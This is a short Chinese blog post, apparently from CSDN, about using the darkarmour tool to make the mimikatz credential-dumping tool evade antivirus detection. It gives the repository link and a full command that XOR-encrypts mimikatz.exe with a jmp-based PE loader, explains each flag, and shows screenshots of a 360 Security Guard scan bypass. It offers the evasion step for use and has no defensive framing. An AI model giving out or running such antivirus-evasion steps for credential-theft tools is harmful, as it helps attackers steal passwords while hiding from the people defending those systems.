darkarmour免杀mimikatz
darkarmour项目地址:
https://github.com/bats3c/darkarmour
darkarmour是一个可用来免杀exe的项目,使用darkarmour来免杀mimikatz
Usage:
./darkarmour.py -f mimikatz.exe -j -l 5 -e xor -o darkmeter.exe
-f:文件加密,如果没有另行说明,则假定为二进制文件
-j:使用基于jmp的pe加载器
-e:加密算法(异或)
-l:加密等级
-o:输出到某一文件
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/73dac59f05b6d1d755a82fea061e737c.png)
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/4a9072b06cd4b2b3718690a2e9596d80.png)
360安全卫士查杀
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/162a23b0bbcf94728e3f14accd66fbb6.png)
Bypass…